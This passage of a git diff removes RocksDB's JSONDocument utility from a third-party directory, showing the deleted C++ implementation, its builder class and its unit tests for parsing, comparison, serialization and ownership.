-      return reinterpret_cast<fbson::Int8Val*>(value)->val();
-    case fbson::FbsonType::T_Int16:
-      return reinterpret_cast<fbson::Int16Val*>(value)->val();
-    case fbson::FbsonType::T_Int32:
-      return reinterpret_cast<fbson::Int32Val*>(value)->val();
-    case fbson::FbsonType::T_Int64:
-      return reinterpret_cast<fbson::Int64Val*>(value)->val();
-    default:
-      assert(false);
-  }
-  return 0;
-}
-
-bool IsComparable(fbson::FbsonValue* left, fbson::FbsonValue* right) {
-  if (left->type() == right->type()) {
-    return true;
-  }
-  if (IsNumeric(left) && IsNumeric(right)) {
-    return true;
-  }
-  return false;
-}
-
-void CreateArray(std::unique_ptr<char[]>* data, fbson::FbsonValue** value) {
-  fbson::FbsonWriter writer;
-  bool res __attribute__((unused)) = writer.writeStartArray();
-  assert(res);
-  res = writer.writeEndArray();
-  assert(res);
-  data->reset(new char[writer.getOutput()->getSize()]);
-  memcpy(data->get(),
-         writer.getOutput()->getBuffer(),
-         writer.getOutput()->getSize());
-  *value = reinterpret_cast<fbson::FbsonDocument*>(data->get())->getValue();
-}
-
-void CreateObject(std::unique_ptr<char[]>* data, fbson::FbsonValue** value) {
-  fbson::FbsonWriter writer;
-  bool res __attribute__((unused)) = writer.writeStartObject();
-  assert(res);
-  res = writer.writeEndObject();
-  assert(res);
-  data->reset(new char[writer.getOutput()->getSize()]);
-  memcpy(data->get(),
-         writer.getOutput()->getBuffer(),
-         writer.getOutput()->getSize());
-  *value = reinterpret_cast<fbson::FbsonDocument*>(data->get())->getValue();
-}
-
-}  // namespace
-
-namespace rocksdb {
-
-
-// TODO(stash): find smth easier
-JSONDocument::JSONDocument() {
-  InitJSONDocument(&data_,
-                   &value_,
-                   std::bind(&fbson::FbsonWriter::writeNull, _1));
-}
-
-JSONDocument::JSONDocument(bool b) {
-  InitJSONDocument(&data_,
-                   &value_,
-                   std::bind(&fbson::FbsonWriter::writeBool, _1, b));
-}
-
-JSONDocument::JSONDocument(double d) {
-  InitJSONDocument(&data_,
-                   &value_,
-                   std::bind(&fbson::FbsonWriter::writeDouble, _1, d));
-}
-
-JSONDocument::JSONDocument(int8_t i) {
-  InitJSONDocument(&data_,
-                   &value_,
-                   std::bind(&fbson::FbsonWriter::writeInt8, _1, i));
-}
-
-JSONDocument::JSONDocument(int16_t i) {
-  InitJSONDocument(&data_,
-                   &value_,
-                   std::bind(&fbson::FbsonWriter::writeInt16, _1, i));
-}
-
-JSONDocument::JSONDocument(int32_t i) {
-  InitJSONDocument(&data_,
-                   &value_,
-                   std::bind(&fbson::FbsonWriter::writeInt32, _1, i));
-}
-
-JSONDocument::JSONDocument(int64_t i) {
-  InitJSONDocument(&data_,
-                   &value_,
-                   std::bind(&fbson::FbsonWriter::writeInt64, _1, i));
-}
-
-JSONDocument::JSONDocument(const std::string& s) {
-  InitString(&data_, &value_, s);
-}
-
-JSONDocument::JSONDocument(const char* s) : JSONDocument(std::string(s)) {
-}
-
-void JSONDocument::InitFromValue(const fbson::FbsonValue* val) {
-  data_.reset(new char[val->numPackedBytes()]);
-  memcpy(data_.get(), val, val->numPackedBytes());
-  value_ = reinterpret_cast<fbson::FbsonValue*>(data_.get());
-}
-
-// Private constructor
-JSONDocument::JSONDocument(fbson::FbsonValue* val, bool makeCopy) {
-  if (makeCopy) {
-    InitFromValue(val);
-  } else {
-    value_ = val;
-  }
-}
-
-JSONDocument::JSONDocument(Type _type) {
-  // TODO(icanadi) make all of this better by using templates
-  switch (_type) {
-    case kNull:
-      InitJSONDocument(&data_, &value_,
-                       std::bind(&fbson::FbsonWriter::writeNull, _1));
-      break;
-    case kObject:
-      CreateObject(&data_, &value_);
-      break;
-    case kBool:
-      InitJSONDocument(&data_, &value_,
-                       std::bind(&fbson::FbsonWriter::writeBool, _1, false));
-      break;
-    case kDouble:
-      InitJSONDocument(&data_, &value_,
-                       std::bind(&fbson::FbsonWriter::writeDouble, _1, 0.));
-      break;
-    case kArray:
-      CreateArray(&data_, &value_);
-      break;
-    case kInt64:
-      InitJSONDocument(&data_, &value_,
-                       std::bind(&fbson::FbsonWriter::writeInt64, _1, 0));
-      break;
-    case kString:
-      InitString(&data_, &value_, "");
-      break;
-    default:
-      assert(false);
-  }
-}
-
-JSONDocument::JSONDocument(const JSONDocument& jsonDocument) {
-  if (jsonDocument.IsOwner()) {
-    InitFromValue(jsonDocument.value_);
-  } else {
-    value_ = jsonDocument.value_;
-  }
-}
-
-JSONDocument::JSONDocument(JSONDocument&& jsonDocument) {
-  value_ = jsonDocument.value_;
-  data_.swap(jsonDocument.data_);
-}
-
-JSONDocument& JSONDocument::operator=(JSONDocument jsonDocument) {
-  value_ = jsonDocument.value_;
-  data_.swap(jsonDocument.data_);
-  return *this;
-}
-
-JSONDocument::Type JSONDocument::type() const {
-  switch (value_->type()) {
-    case fbson::FbsonType::T_Null:
-      return JSONDocument::kNull;
-
-    case fbson::FbsonType::T_True:
-    case fbson::FbsonType::T_False:
-      return JSONDocument::kBool;
-
-    case fbson::FbsonType::T_Int8:
-    case fbson::FbsonType::T_Int16:
-    case fbson::FbsonType::T_Int32:
-    case fbson::FbsonType::T_Int64:
-      return JSONDocument::kInt64;
-
-    case fbson::FbsonType::T_Double:
-      return JSONDocument::kDouble;
-
-    case fbson::FbsonType::T_String:
-      return JSONDocument::kString;
-
-    case fbson::FbsonType::T_Object:
-      return JSONDocument::kObject;
-
-    case fbson::FbsonType::T_Array:
-      return JSONDocument::kArray;
-
-    case fbson::FbsonType::T_Binary:
-    default:
-      assert(false);
-  }
-  return JSONDocument::kNull;
-}
-
-bool JSONDocument::Contains(const std::string& key) const {
-  assert(IsObject());
-  auto objectVal = reinterpret_cast<fbson::ObjectVal*>(value_);
-  return objectVal->find(key.c_str()) != nullptr;
-}
-
-JSONDocument JSONDocument::operator[](const std::string& key) const {
-  assert(IsObject());
-  auto objectVal = reinterpret_cast<fbson::ObjectVal*>(value_);
-  auto foundValue = objectVal->find(key.c_str());
-  assert(foundValue != nullptr);
-  // No need to save paths in const objects
-  JSONDocument ans(foundValue, false);
-  return ans;
-}
-
-size_t JSONDocument::Count() const {
-  assert(IsObject() || IsArray());
-  if (IsObject()) {
-    // TODO(stash): add to fbson?
-    const fbson::ObjectVal& objectVal =
-          *reinterpret_cast<fbson::ObjectVal*>(value_);
-    return ObjectNumElem(objectVal);
-  } else if (IsArray()) {
-    auto arrayVal = reinterpret_cast<fbson::ArrayVal*>(value_);
-    return arrayVal->numElem();
-  }
-  assert(false);
-  return 0;
-}
-
-JSONDocument JSONDocument::operator[](size_t i) const {
-  assert(IsArray());
-  auto arrayVal = reinterpret_cast<fbson::ArrayVal*>(value_);
-  auto foundValue = arrayVal->get(static_cast<int>(i));
-  JSONDocument ans(foundValue, false);
-  return ans;
-}
-
-bool JSONDocument::IsNull() const {
-  return value_->isNull();
-}
-
-bool JSONDocument::IsArray() const {
-  return value_->isArray();
-}
-
-bool JSONDocument::IsBool() const {
-  return value_->isTrue() || value_->isFalse();
-}
-
-bool JSONDocument::IsDouble() const {
-  return value_->isDouble();
-}
-
-bool JSONDocument::IsInt64() const {
-  return value_->isInt8() || value_->isInt16() ||
-         value_->isInt32() || value_->isInt64();
-}
-
-bool JSONDocument::IsObject() const {
-  return value_->isObject();
-}
-
-bool JSONDocument::IsString() const {
-  return value_->isString();
-}
-
-bool JSONDocument::GetBool() const {
-  assert(IsBool());
-  return value_->isTrue();
-}
-
-double JSONDocument::GetDouble() const {
-  assert(IsDouble());
-  return ((fbson::DoubleVal*)value_)->val();
-}
-
-int64_t JSONDocument::GetInt64() const {
-  assert(IsInt64());
-  return GetInt64ValFromFbsonNumericType(value_);
-}
-
-std::string JSONDocument::GetString() const {
-  assert(IsString());
-  fbson::StringVal* stringVal = (fbson::StringVal*)value_;
-  return std::string(stringVal->getBlob(), stringVal->getBlobLen());
-}
-
-namespace {
-
-// FbsonValue can be int8, int16, int32, int64
-bool CompareNumeric(fbson::FbsonValue* left, fbson::FbsonValue* right) {
-  assert(IsNumeric(left) && IsNumeric(right));
-  return GetInt64ValFromFbsonNumericType(left) ==
-         GetInt64ValFromFbsonNumericType(right);
-}
-
-bool CompareSimpleTypes(fbson::FbsonValue* left, fbson::FbsonValue* right) {
-  if (IsNumeric(left)) {
-    return CompareNumeric(left, right);
-  }
-  if (left->numPackedBytes() != right->numPackedBytes()) {
-    return false;
-  }
-  return memcmp(left, right, left->numPackedBytes()) == 0;
-}
-
-bool CompareFbsonValue(fbson::FbsonValue* left, fbson::FbsonValue* right) {
-  if (!IsComparable(left, right)) {
-    return false;
-  }
-
-  switch (left->type()) {
-    case fbson::FbsonType::T_True:
-    case fbson::FbsonType::T_False:
-    case fbson::FbsonType::T_Null:
-      return true;
-    case fbson::FbsonType::T_Int8:
-    case fbson::FbsonType::T_Int16:
-    case fbson::FbsonType::T_Int32:
-    case fbson::FbsonType::T_Int64:
-      return CompareNumeric(left, right);
-    case fbson::FbsonType::T_String:
-    case fbson::FbsonType::T_Double:
-      return CompareSimpleTypes(left, right);
-    case fbson::FbsonType::T_Object:
-    {
-      auto leftObject = reinterpret_cast<fbson::ObjectVal*>(left);
-      auto rightObject = reinterpret_cast<fbson::ObjectVal*>(right);
-      if (ObjectNumElem(*leftObject) != ObjectNumElem(*rightObject)) {
-        return false;
-      }
-      for (auto && keyValue : *leftObject) {
-        std::string str(keyValue.getKeyStr(), keyValue.klen());
-        if (rightObject->find(str.c_str()) == nullptr) {
-          return false;
-        }
-        if (!CompareFbsonValue(keyValue.value(),
-                               rightObject->find(str.c_str()))) {
-          return false;
-        }
-      }
-      return true;
-    }
-    case fbson::FbsonType::T_Array:
-    {
-      auto leftArr = reinterpret_cast<fbson::ArrayVal*>(left);
-      auto rightArr = reinterpret_cast<fbson::ArrayVal*>(right);
-      if (leftArr->numElem() != rightArr->numElem()) {
-        return false;
-      }
-      for (int i = 0; i < static_cast<int>(leftArr->numElem()); ++i) {
-        if (!CompareFbsonValue(leftArr->get(i), rightArr->get(i))) {
-          return false;
-        }
-      }
-      return true;
-    }
-    default:
-      assert(false);
-  }
-  return false;
-}
-
-}  // namespace
-
-bool JSONDocument::operator==(const JSONDocument& rhs) const {
-  return CompareFbsonValue(value_, rhs.value_);
-}
-
-bool JSONDocument::operator!=(const JSONDocument& rhs) const {
-  return !(*this == rhs);
-}
-
-JSONDocument JSONDocument::Copy() const {
-  return JSONDocument(value_, true);
-}
-
-bool JSONDocument::IsOwner() const {
-  return data_.get() != nullptr;
-}
-
-std::string JSONDocument::DebugString() const {
-  fbson::FbsonToJson fbsonToJson;
-  return fbsonToJson.json(value_);
-}
-
-JSONDocument::ItemsIteratorGenerator JSONDocument::Items() const {
-  assert(IsObject());
-  return ItemsIteratorGenerator(*(reinterpret_cast<fbson::ObjectVal*>(value_)));
-}
-
-// TODO(icanadi) (perf) allocate objects with arena
-JSONDocument* JSONDocument::ParseJSON(const char* json) {
-  fbson::FbsonJsonParser parser;
-  if (!parser.parse(json)) {
-    return nullptr;
-  }
-
-  auto fbsonVal = fbson::FbsonDocument::createValue(
-                    parser.getWriter().getOutput()->getBuffer(),
-              static_cast<uint32_t>(parser.getWriter().getOutput()->getSize()));
-
-  if (fbsonVal == nullptr) {
-    return nullptr;
-  }
-
-  return new JSONDocument(fbsonVal, true);
-}
-
-void JSONDocument::Serialize(std::string* dst) const {
-  // first byte is reserved for header
-  // currently, header is only version number. that will help us provide
-  // backwards compatility. we might also store more information here if
-  // necessary
-  dst->push_back(kSerializationFormatVersion);
-  dst->push_back(FBSON_VER);
-  dst->append(reinterpret_cast<char*>(value_), value_->numPackedBytes());
-}
-
-const char JSONDocument::kSerializationFormatVersion = 2;
-
-JSONDocument* JSONDocument::Deserialize(const Slice& src) {
-  Slice input(src);
-  if (src.size() == 0) {
-    return nullptr;
-  }
-  char header = input[0];
-  if (header == 1) {
-    assert(false);
-  }
-  input.remove_prefix(1);
-  auto value = fbson::FbsonDocument::createValue(input.data(),
-                static_cast<uint32_t>(input.size()));
-  if (value == nullptr) {
-    return nullptr;
-  }
-
-  return new JSONDocument(value, true);
-}
-
-class JSONDocument::const_item_iterator::Impl {
- public:
-  typedef fbson::ObjectVal::const_iterator It;
-
-  explicit Impl(It it) : it_(it) {}
-
-  const char* getKeyStr() const {
-    return it_->getKeyStr();
-  }
-
-  uint8_t klen() const {
-    return it_->klen();
-  }
-
-  It& operator++() {
-    return ++it_;
-  }
-
-  bool operator!=(const Impl& other) {
-    return it_ != other.it_;
-  }
-
-  fbson::FbsonValue* value() const {
-    return it_->value();
-  }
-
- private:
-  It it_;
-};
-
-JSONDocument::const_item_iterator::const_item_iterator(Impl* impl)
-: it_(impl) {}
-
-JSONDocument::const_item_iterator::const_item_iterator(const_item_iterator&& a)
-: it_(std::move(a.it_)) {}
-
-JSONDocument::const_item_iterator&
-  JSONDocument::const_item_iterator::operator++() {
-  ++(*it_);
-  return *this;
-}
-
-bool JSONDocument::const_item_iterator::operator!=(
-                                  const const_item_iterator& other) {
-  return *it_ != *(other.it_);
-}
-
-JSONDocument::const_item_iterator::~const_item_iterator() {
-}
-
-JSONDocument::const_item_iterator::value_type
-  JSONDocument::const_item_iterator::operator*() {
-  return JSONDocument::const_item_iterator::value_type(std::string(it_->getKeyStr(), it_->klen()),
-    JSONDocument(it_->value(), false));
-}
-
-JSONDocument::ItemsIteratorGenerator::ItemsIteratorGenerator(
-                                      const fbson::ObjectVal& object)
-  : object_(object) {}
-
-JSONDocument::const_item_iterator
-      JSONDocument::ItemsIteratorGenerator::begin() const {
-  return const_item_iterator(new const_item_iterator::Impl(object_.begin()));
-}
-
-JSONDocument::const_item_iterator
-      JSONDocument::ItemsIteratorGenerator::end() const {
-  return const_item_iterator(new const_item_iterator::Impl(object_.end()));
-}
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/document/json_document_builder.cc b/thirdparty/rocksdb/utilities/document/json_document_builder.cc
deleted file mode 100644
index 7aa95e4..0000000
--- a/thirdparty/rocksdb/utilities/document/json_document_builder.cc
+++ /dev/null
@@ -1,120 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#include <assert.h>
-#include <limits>
-#include <stdint.h>
-#include "rocksdb/utilities/json_document.h"
-#include "third-party/fbson/FbsonWriter.h"
-
-namespace rocksdb {
-JSONDocumentBuilder::JSONDocumentBuilder()
-: writer_(new fbson::FbsonWriter()) {
-}
-
-JSONDocumentBuilder::JSONDocumentBuilder(fbson::FbsonOutStream* out)
-: writer_(new fbson::FbsonWriter(*out)) {
-}
-
-void JSONDocumentBuilder::Reset() {
-  writer_->reset();
-}
-
-bool JSONDocumentBuilder::WriteStartArray() {
-  return writer_->writeStartArray();
-}
-
-bool JSONDocumentBuilder::WriteEndArray() {
-  return writer_->writeEndArray();
-}
-
-bool JSONDocumentBuilder::WriteStartObject() {
-  return writer_->writeStartObject();
-}
-
-bool JSONDocumentBuilder::WriteEndObject() {
-  return writer_->writeEndObject();
-}
-
-bool JSONDocumentBuilder::WriteKeyValue(const std::string& key,
-                                        const JSONDocument& value) {
-  assert(key.size() <= std::numeric_limits<uint8_t>::max());
-  size_t bytesWritten = writer_->writeKey(key.c_str(),
-    static_cast<uint8_t>(key.size()));
-  if (bytesWritten == 0) {
-    return false;
-  }
-  return WriteJSONDocument(value);
-}
-
-bool JSONDocumentBuilder::WriteJSONDocument(const JSONDocument& value) {
-  switch (value.type()) {
-    case JSONDocument::kNull:
-      return writer_->writeNull() != 0;
-    case JSONDocument::kInt64:
-      return writer_->writeInt64(value.GetInt64());
-    case JSONDocument::kDouble:
-      return writer_->writeDouble(value.GetDouble());
-    case JSONDocument::kBool:
-      return writer_->writeBool(value.GetBool());
-    case JSONDocument::kString:
-    {
-      bool res = writer_->writeStartString();
-      if (!res) {
-        return false;
-      }
-      const std::string& str = value.GetString();
-      res = writer_->writeString(str.c_str(),
-                  static_cast<uint32_t>(str.size()));
-      if (!res) {
-        return false;
-      }
-      return writer_->writeEndString();
-    }
-    case JSONDocument::kArray:
-    {
-      bool res = WriteStartArray();
-      if (!res) {
-        return false;
-      }
-      for (size_t i = 0; i < value.Count(); ++i) {
-        res = WriteJSONDocument(value[i]);
-        if (!res) {
-          return false;
-        }
-      }
-      return WriteEndArray();
-    }
-    case JSONDocument::kObject:
-    {
-      bool res = WriteStartObject();
-      if (!res) {
-        return false;
-      }
-      for (auto keyValue : value.Items()) {
-        WriteKeyValue(keyValue.first, keyValue.second);
-      }
-      return WriteEndObject();
-    }
-    default:
-      assert(false);
-  }
-  return false;
-}
-
-JSONDocument JSONDocumentBuilder::GetJSONDocument() {
-  fbson::FbsonValue* value =
-      fbson::FbsonDocument::createValue(writer_->getOutput()->getBuffer(),
-                       static_cast<uint32_t>(writer_->getOutput()->getSize()));
-  return JSONDocument(value, true);
-}
-
-JSONDocumentBuilder::~JSONDocumentBuilder() {
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/document/json_document_test.cc b/thirdparty/rocksdb/utilities/document/json_document_test.cc
deleted file mode 100644
index c7bfb39..0000000
--- a/thirdparty/rocksdb/utilities/document/json_document_test.cc
+++ /dev/null
@@ -1,341 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <map>
-#include <set>
-#include <string>
-
-#include "rocksdb/utilities/json_document.h"
-
-#include "util/testutil.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-namespace {
-void AssertField(const JSONDocument& json, const std::string& field) {
-  ASSERT_TRUE(json.Contains(field));
-  ASSERT_TRUE(json[field].IsNull());
-}
-
-void AssertField(const JSONDocument& json, const std::string& field,
-                 const std::string& expected) {
-  ASSERT_TRUE(json.Contains(field));
-  ASSERT_TRUE(json[field].IsString());
-  ASSERT_EQ(expected, json[field].GetString());
-}
-
-void AssertField(const JSONDocument& json, const std::string& field,
-                 int64_t expected) {
-  ASSERT_TRUE(json.Contains(field));
-  ASSERT_TRUE(json[field].IsInt64());
-  ASSERT_EQ(expected, json[field].GetInt64());
-}
-
-void AssertField(const JSONDocument& json, const std::string& field,
-                 bool expected) {
-  ASSERT_TRUE(json.Contains(field));
-  ASSERT_TRUE(json[field].IsBool());
-  ASSERT_EQ(expected, json[field].GetBool());
-}
-
-void AssertField(const JSONDocument& json, const std::string& field,
-                 double expected) {
-  ASSERT_TRUE(json.Contains(field));
-  ASSERT_TRUE(json[field].IsDouble());
-  ASSERT_DOUBLE_EQ(expected, json[field].GetDouble());
-}
-}  // namespace
-
-class JSONDocumentTest : public testing::Test {
- public:
-  JSONDocumentTest()
-  : rnd_(101)
-  {}
-
-  void AssertSampleJSON(const JSONDocument& json) {
-    AssertField(json, "title", std::string("json"));
-    AssertField(json, "type", std::string("object"));
-    // properties
-    ASSERT_TRUE(json.Contains("properties"));
-    ASSERT_TRUE(json["properties"].Contains("flags"));
-    ASSERT_TRUE(json["properties"]["flags"].IsArray());
-    ASSERT_EQ(3u, json["properties"]["flags"].Count());
-    ASSERT_TRUE(json["properties"]["flags"][0].IsInt64());
-    ASSERT_EQ(10, json["properties"]["flags"][0].GetInt64());
-    ASSERT_TRUE(json["properties"]["flags"][1].IsString());
-    ASSERT_EQ("parse", json["properties"]["flags"][1].GetString());
-    ASSERT_TRUE(json["properties"]["flags"][2].IsObject());
-    AssertField(json["properties"]["flags"][2], "tag", std::string("no"));
-    AssertField(json["properties"]["flags"][2], std::string("status"));
-    AssertField(json["properties"], "age", 110.5e-4);
-    AssertField(json["properties"], "depth", static_cast<int64_t>(-10));
-    // test iteration
-    std::set<std::string> expected({"flags", "age", "depth"});
-    for (auto item : json["properties"].Items()) {
-      auto iter = expected.find(item.first);
-      ASSERT_TRUE(iter != expected.end());
-      expected.erase(iter);
-    }
-    ASSERT_EQ(0U, expected.size());
-    ASSERT_TRUE(json.Contains("latlong"));
-    ASSERT_TRUE(json["latlong"].IsArray());
-    ASSERT_EQ(2u, json["latlong"].Count());
-    ASSERT_TRUE(json["latlong"][0].IsDouble());
-    ASSERT_EQ(53.25, json["latlong"][0].GetDouble());
-    ASSERT_TRUE(json["latlong"][1].IsDouble());
-    ASSERT_EQ(43.75, json["latlong"][1].GetDouble());
-    AssertField(json, "enabled", true);
-  }
-
-  const std::string kSampleJSON =
-      "{ \"title\" : \"json\", \"type\" : \"object\", \"properties\" : { "
-      "\"flags\": [10, \"parse\", {\"tag\": \"no\", \"status\": null}], "
-      "\"age\": 110.5e-4, \"depth\": -10 }, \"latlong\": [53.25, 43.75], "
-      "\"enabled\": true }";
-
-  const std::string kSampleJSONDifferent =
-      "{ \"title\" : \"json\", \"type\" : \"object\", \"properties\" : { "
-      "\"flags\": [10, \"parse\", {\"tag\": \"no\", \"status\": 2}], "
-      "\"age\": 110.5e-4, \"depth\": -10 }, \"latlong\": [53.25, 43.75], "
-      "\"enabled\": true }";
-
-  Random rnd_;
-};
-
-TEST_F(JSONDocumentTest, MakeNullTest) {
-  JSONDocument x;
-  ASSERT_TRUE(x.IsNull());
-  ASSERT_TRUE(x.IsOwner());
-  ASSERT_TRUE(!x.IsBool());
-}
-
-TEST_F(JSONDocumentTest, MakeBoolTest) {
-  {
-    JSONDocument x(true);
-    ASSERT_TRUE(x.IsOwner());
-    ASSERT_TRUE(x.IsBool());
-    ASSERT_TRUE(!x.IsInt64());
-    ASSERT_EQ(x.GetBool(), true);
-  }
-
-  {
-    JSONDocument x(false);
-    ASSERT_TRUE(x.IsOwner());
-    ASSERT_TRUE(x.IsBool());
-    ASSERT_TRUE(!x.IsInt64());
-    ASSERT_EQ(x.GetBool(), false);
-  }
-}
-
-TEST_F(JSONDocumentTest, MakeInt64Test) {
-  JSONDocument x(static_cast<int64_t>(16));
-  ASSERT_TRUE(x.IsInt64());
-  ASSERT_TRUE(x.IsInt64());
-  ASSERT_TRUE(!x.IsBool());
-  ASSERT_TRUE(x.IsOwner());
-  ASSERT_EQ(x.GetInt64(), 16);
-}
-
-TEST_F(JSONDocumentTest, MakeStringTest) {
-  JSONDocument x("string");
-  ASSERT_TRUE(x.IsOwner());
-  ASSERT_TRUE(x.IsString());
-  ASSERT_TRUE(!x.IsBool());
-  ASSERT_EQ(x.GetString(), "string");
-}
-
-TEST_F(JSONDocumentTest, MakeDoubleTest) {
-  JSONDocument x(5.6);
-  ASSERT_TRUE(x.IsOwner());
-  ASSERT_TRUE(x.IsDouble());
-  ASSERT_TRUE(!x.IsBool());
-  ASSERT_EQ(x.GetDouble(), 5.6);
-}
-
-TEST_F(JSONDocumentTest, MakeByTypeTest) {
-  {
-    JSONDocument x(JSONDocument::kNull);
-    ASSERT_TRUE(x.IsNull());
-  }
-  {
-    JSONDocument x(JSONDocument::kBool);
-    ASSERT_TRUE(x.IsBool());
-  }
-  {
-    JSONDocument x(JSONDocument::kString);
-    ASSERT_TRUE(x.IsString());
-  }
-  {
-    JSONDocument x(JSONDocument::kInt64);
-    ASSERT_TRUE(x.IsInt64());
-  }
-  {
-    JSONDocument x(JSONDocument::kDouble);
-    ASSERT_TRUE(x.IsDouble());
-  }
-  {
-    JSONDocument x(JSONDocument::kObject);
-    ASSERT_TRUE(x.IsObject());
-  }
-  {
-    JSONDocument x(JSONDocument::kArray);
-    ASSERT_TRUE(x.IsArray());
-  }
-}
-
-TEST_F(JSONDocumentTest, Parsing) {
-  std::unique_ptr<JSONDocument> parsed_json(
-          JSONDocument::ParseJSON(kSampleJSON.c_str()));
-  ASSERT_TRUE(parsed_json->IsOwner());
-  ASSERT_TRUE(parsed_json != nullptr);
-  AssertSampleJSON(*parsed_json);
-
-  // test deep copying
-  JSONDocument copied_json_document(*parsed_json);
-  AssertSampleJSON(copied_json_document);
-  ASSERT_TRUE(copied_json_document == *parsed_json);
-
-  std::unique_ptr<JSONDocument> parsed_different_sample(
-      JSONDocument::ParseJSON(kSampleJSONDifferent.c_str()));
-  ASSERT_TRUE(parsed_different_sample != nullptr);
-  ASSERT_TRUE(!(*parsed_different_sample == copied_json_document));
-
-  // parse error
-  const std::string kFaultyJSON =
-      kSampleJSON.substr(0, kSampleJSON.size() - 10);
-  ASSERT_TRUE(JSONDocument::ParseJSON(kFaultyJSON.c_str()) == nullptr);
-}
-
-TEST_F(JSONDocumentTest, Serialization) {
-  std::unique_ptr<JSONDocument> parsed_json(
-            JSONDocument::ParseJSON(kSampleJSON.c_str()));
-  ASSERT_TRUE(parsed_json != nullptr);
-  ASSERT_TRUE(parsed_json->IsOwner());
-  std::string serialized;
-  parsed_json->Serialize(&serialized);
-
-  std::unique_ptr<JSONDocument> deserialized_json(
-            JSONDocument::Deserialize(Slice(serialized)));
-  ASSERT_TRUE(deserialized_json != nullptr);
-  AssertSampleJSON(*deserialized_json);
-
-  // deserialization failure
-  ASSERT_TRUE(JSONDocument::Deserialize(
-                  Slice(serialized.data(), serialized.size() - 10)) == nullptr);
-}
-
-TEST_F(JSONDocumentTest, OperatorEqualsTest) {
-  // kNull
-  ASSERT_TRUE(JSONDocument() == JSONDocument());
-
-  // kBool
-  ASSERT_TRUE(JSONDocument(false) != JSONDocument());
-  ASSERT_TRUE(JSONDocument(false) == JSONDocument(false));
-  ASSERT_TRUE(JSONDocument(true) == JSONDocument(true));
-  ASSERT_TRUE(JSONDocument(false) != JSONDocument(true));
-
-  // kString
-  ASSERT_TRUE(JSONDocument("test") != JSONDocument());
-  ASSERT_TRUE(JSONDocument("test") == JSONDocument("test"));
-
-  // kInt64
-  ASSERT_TRUE(JSONDocument(static_cast<int64_t>(15)) != JSONDocument());
-  ASSERT_TRUE(JSONDocument(static_cast<int64_t>(15)) !=
-              JSONDocument(static_cast<int64_t>(14)));
-  ASSERT_TRUE(JSONDocument(static_cast<int64_t>(15)) ==
-              JSONDocument(static_cast<int64_t>(15)));
-
-  unique_ptr<JSONDocument> arrayWithInt8Doc(JSONDocument::ParseJSON("[8]"));
-  ASSERT_TRUE(arrayWithInt8Doc != nullptr);
-  ASSERT_TRUE(arrayWithInt8Doc->IsArray());
-  ASSERT_TRUE((*arrayWithInt8Doc)[0].IsInt64());
-  ASSERT_TRUE((*arrayWithInt8Doc)[0] == JSONDocument(static_cast<int64_t>(8)));
-
-  unique_ptr<JSONDocument> arrayWithInt16Doc(JSONDocument::ParseJSON("[512]"));
-  ASSERT_TRUE(arrayWithInt16Doc != nullptr);
-  ASSERT_TRUE(arrayWithInt16Doc->IsArray());
-  ASSERT_TRUE((*arrayWithInt16Doc)[0].IsInt64());
-  ASSERT_TRUE((*arrayWithInt16Doc)[0] ==
-              JSONDocument(static_cast<int64_t>(512)));
-
-  unique_ptr<JSONDocument> arrayWithInt32Doc(
-    JSONDocument::ParseJSON("[1000000]"));
-  ASSERT_TRUE(arrayWithInt32Doc != nullptr);
-  ASSERT_TRUE(arrayWithInt32Doc->IsArray());
-  ASSERT_TRUE((*arrayWithInt32Doc)[0].IsInt64());
-  ASSERT_TRUE((*arrayWithInt32Doc)[0] ==
-               JSONDocument(static_cast<int64_t>(1000000)));
-
-  // kDouble
-  ASSERT_TRUE(JSONDocument(15.) != JSONDocument());
-  ASSERT_TRUE(JSONDocument(15.) != JSONDocument(14.));
-  ASSERT_TRUE(JSONDocument(15.) == JSONDocument(15.));
-}
-
-TEST_F(JSONDocumentTest, JSONDocumentBuilderTest) {
-  unique_ptr<JSONDocument> parsedArray(
-    JSONDocument::ParseJSON("[1, [123, \"a\", \"b\"], {\"b\":\"c\"}]"));
-  ASSERT_TRUE(parsedArray != nullptr);
-
-  JSONDocumentBuilder builder;
-  ASSERT_TRUE(builder.WriteStartArray());
-  ASSERT_TRUE(builder.WriteJSONDocument(1));
-
-  ASSERT_TRUE(builder.WriteStartArray());
-    ASSERT_TRUE(builder.WriteJSONDocument(123));
-    ASSERT_TRUE(builder.WriteJSONDocument("a"));
-    ASSERT_TRUE(builder.WriteJSONDocument("b"));
-  ASSERT_TRUE(builder.WriteEndArray());
-
-  ASSERT_TRUE(builder.WriteStartObject());
-    ASSERT_TRUE(builder.WriteKeyValue("b", "c"));
-  ASSERT_TRUE(builder.WriteEndObject());
-
-  ASSERT_TRUE(builder.WriteEndArray());
-
-  ASSERT_TRUE(*parsedArray == builder.GetJSONDocument());
-}
-
-TEST_F(JSONDocumentTest, OwnershipTest) {
-  std::unique_ptr<JSONDocument> parsed(
-          JSONDocument::ParseJSON(kSampleJSON.c_str()));
-  ASSERT_TRUE(parsed != nullptr);
-  ASSERT_TRUE(parsed->IsOwner());
-
-  // Copy constructor from owner -> owner
-  JSONDocument copy_constructor(*parsed);
-  ASSERT_TRUE(copy_constructor.IsOwner());
-
-  // Copy constructor from non-owner -> non-owner
-  JSONDocument non_owner((*parsed)["properties"]);
-  ASSERT_TRUE(!non_owner.IsOwner());
-
-  // Move constructor from owner -> owner
-  JSONDocument moved_from_owner(std::move(copy_constructor));
-  ASSERT_TRUE(moved_from_owner.IsOwner());
-
-  // Move constructor from non-owner -> non-owner
-  JSONDocument moved_from_non_owner(std::move(non_owner));
-  ASSERT_TRUE(!moved_from_non_owner.IsOwner());
-}
-
-}  //  namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
